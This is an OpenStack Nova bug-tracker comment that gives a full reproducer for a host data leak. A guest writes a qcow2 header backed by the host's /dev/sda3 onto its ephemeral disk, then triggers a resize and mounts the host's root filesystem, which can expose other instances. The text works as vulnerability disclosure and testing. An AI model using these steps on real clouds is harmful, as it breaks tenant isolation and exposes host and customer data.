OpenStack Compute (nova)

  1. Series liberty
  2. Bug #1548450
  3. Comment #7

Comment 7 for bug 1548450

Revision history for this message
Lee Yarwood (lyarwood) wrote : Re: Host data leak during resize/migrate for raw-backed instances

I've been able to reproduce this using a compute host block device as the backing file on RHEL OSP 8 (Liberty). I plan on repeating this with devstack for Mitaka shortly. My notes on this reproducer are below :

- Image and flavor configuration :

# wget https://download.fedoraproject.org/pub/fedora/linux/releases/23/Cloud/x86_64/Images/Fedora-Cloud-Base-23-20151030.x86_64.qcow2
# glance image-create --name fedora --file Fedora-Cloud-Base-23-20151030.x86_64.qcow2 --disk-format qcow2 --container-format bare --progress
# nova flavor-create eph 6 512 5 1 --ephemeral 1
# nova flavor-create eph_large 7 768 5 1 --ephemeral 1

- Ensure use_cow_images is False on all compute hosts :

# openstack-config --get /etc/nova/nova.conf libvirt use_cow_images
False

- Boot an instance using the fedora image and a small ephemeral disk :

# nova boot --key-name local --image fedora --ephemeral size=1,format=ext4 --flavor 6 --nic net-id=b41000f6-9de2-4851-a622-2a5786167e83 test-boot

root@host # ps aux | grep qemu
qemu 18725 93.7 9.4 1421432 751232 ? Rl 14:00 6:47 /usr/libexec/qemu-kvm -name instance-00000005 -S -machine pc-i440fx-rhel7.2.0,accel=tcg,usb=off -m 512 -realtime mlock=off -smp 1,sockets=1,cores=1,threads=1 -uuid d56b9bf3-f3b0-4d76-952b-5015b43babcd -smbios type=1,manufacturer=Red Hat,product=OpenStack Compute,version=12.0.1-6.el7ost,serial=c512dcd1-48bb-644c-9794-82f056d85a95,uuid=d56b9bf3-f3b0-4d76-952b-5015b43babcd,family=Virtual Machine -no-user-config -nodefaults -chardev socket,id=charmonitor,path=/var/lib/libvirt/qemu/domain-instance-00000005/monitor.sock,server,nowait -mon chardev=charmonitor,id=monitor,mode=control -rtc base=utc -no-shutdown -boot strict=on -device piix3-usb-uhci,id=usb,bus=pci.0,addr=0x1.0x2 -drive file=/var/lib/nova/instances/d56b9bf3-f3b0-4d76-952b-5015b43babcd/disk,if=none,id=drive-virtio-disk0,format=raw,cache=none -device virtio-blk-pci,scsi=off,bus=pci.0,addr=0x4,drive=drive-virtio-disk0,id=virtio-disk0,bootindex=1 -drive file=/var/lib/nova/instances/d56b9bf3-f3b0-4d76-952b-5015b43babcd/disk.eph0,if=none,id=drive-virtio-disk1,format=raw,cache=none -device virtio-blk-pci,scsi=off,bus=pci.0,addr=0x5,drive=drive-virtio-disk1,id=virtio-disk1 -netdev tap,fd=26,id=hostnet0 -device virtio-net-pci,netdev=hostnet0,id=net0,mac=fa:16:3e:32:1c:23,bus=pci.0,addr=0x3 -chardev file,id=charserial0,path=/var/lib/nova/instances/d56b9bf3-f3b0-4d76-952b-5015b43babcd/console.log -device isa-serial,chardev=charserial0,id=serial0 -chardev pty,id=charserial1 -device isa-serial,chardev=charserial1,id=serial1 -device usb-tablet,id=input0 -vnc 0.0.0.0:0 -k en-us -device cirrus-vga,id=video0,bus=pci.0,addr=0x2 -device virtio-balloon-pci,id=balloon0,bus=pci.0,addr=0x6 -msg timestamp=on

- Confirm the block layout within the guest and umount the formatted ephemeral disk :

root@guest # lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
vda 252:0 0 5G 0 disk
└─vda1 252:1 0 5G 0 part /
vdb 252:16 0 1G 0 disk /mnt
root@guest # umount /mnt

- Use qemu-img to write a qcow2 header to the device using a physical device on the host as a backing file :

root@guest # qemu-img create -f qcow2 -o backing_file=/dev/sda3,backing_fmt=raw /dev/vdb 20G
Formatting '/dev/vdb', fmt=qcow2 size=21474836480 backing_file='/dev/sda3' backing_fmt='raw' encryption=off cluster_size=65536 lazy_refcounts=off refcount_bits=16

root@guest # qemu-img info /dev/vdb
image: /dev/vdb
file format: qcow2
virtual size: 20G (21474836480 bytes)
disk size: 0
cluster_size: 65536
backing file: /dev/sda3
backing file format: raw
Format specific information:
    compat: 1.1
    lazy refcounts: false
    refcount bits: 16
    corrupt: false

- Now request a resize of the instance :

# nova resize d56b9bf3-f3b0-4d76-952b-5015b43babcd 7

- Once complete confirm the qemu-kvm command line used to launch the instance, note the qcow2 format for the ephemeral disk :

root@host # ps aux | grep qemu
qemu 20762 99.8 5.5 1859748 436596 ? Rl 14:11 0:22 /usr/libexec/qemu-kvm -name instance-00000005 -S -machine pc-i440fx-rhel7.2.0,accel=tcg,usb=off -m 768 -realtime mlock=off -smp 1,sockets=1,cores=1,threads=1 -uuid d56b9bf3-f3b0-4d76-952b-5015b43babcd -smbios type=1,manufacturer=Red Hat,product=OpenStack Compute,version=12.0.1-6.el7ost,serial=599d7700-3d4b-1543-8882-f4ec4901c043,uuid=d56b9bf3-f3b0-4d76-952b-5015b43babcd,family=Virtual Machine -no-user-config -nodefaults -chardev socket,id=charmonitor,path=/var/lib/libvirt/qemu/domain-instance-00000005/monitor.sock,server,nowait -mon chardev=charmonitor,id=monitor,mode=control -rtc base=utc -no-shutdown -boot strict=on -device piix3-usb-uhci,id=usb,bus=pci.0,addr=0x1.0x2 -drive file=/var/lib/nova/instances/d56b9bf3-f3b0-4d76-952b-5015b43babcd/disk,if=none,id=drive-virtio-disk0,format=raw,cache=none -device virtio-blk-pci,scsi=off,bus=pci.0,addr=0x4,drive=drive-virtio-disk0,id=virtio-disk0,bootindex=1 -drive file=/var/lib/nova/instances/d56b9bf3-f3b0-4d76-952b-5015b43babcd/disk.eph0,if=none,id=drive-virtio-disk1,format=qcow2,cache=none -device virtio-blk-pci,scsi=off,bus=pci.0,addr=0x5,drive=drive-virtio-disk1,id=virtio-disk1 -netdev tap,fd=26,id=hostnet0 -device virtio-net-pci,netdev=hostnet0,id=net0,mac=fa:16:3e:32:1c:23,bus=pci.0,addr=0x3 -chardev file,id=charserial0,path=/var/lib/nova/instances/d56b9bf3-f3b0-4d76-952b-5015b43babcd/console.log -device isa-serial,chardev=charserial0,id=serial0 -chardev pty,id=charserial1 -device isa-serial,chardev=charserial1,id=serial1 -device usb-tablet,id=input0 -vnc 0.0.0.0:0 -k en-us -device cirrus-vga,id=video0,bus=pci.0,addr=0x2 -device virtio-balloon-pci,id=balloon0,bus=pci.0,addr=0x6 -msg timestamp=on

- Again within the guest confirm the block layout, note that there is now a 20G device mounted under /mnt :

root@guest # lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
vda 252:0 0 5G 0 disk
└─vda1 252:1 0 5G 0 part /
vdb 252:16 0 20G 0 disk /mnt

- As we have full access to the block device we can gain access not only to files on the host but potentially other instances as well :

root@guest # cat /mnt/etc/redhat-release
Red Hat Enterprise Linux Server release 7.2 (Maipo)

root@guest # qemu-img info /mnt/var/lib/nova/instances/d56b9bf3-f3b0-4d76-952b-5015b43babcd/disk.eph0
image: /mnt/var/lib/nova/instances/d56b9bf3-f3b0-4d76-952b-5015b43babcd/disk.eph0
file format: qcow2
virtual size: 20G (21474836480 bytes)
disk size: 1.0G
cluster_size: 65536
backing file: /dev/sda3
backing file format: raw
Format specific information:
    compat: 1.1
    lazy refcounts: false
    refcount bits: 16
    corrupt: false

root@host # lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 20G 0 disk
├─sda1 8:1 0 512M 0 part /boot
├─sda2 8:2 0 1G 0 part [SWAP]
└─sda3 8:3 0 18.5G 0 part /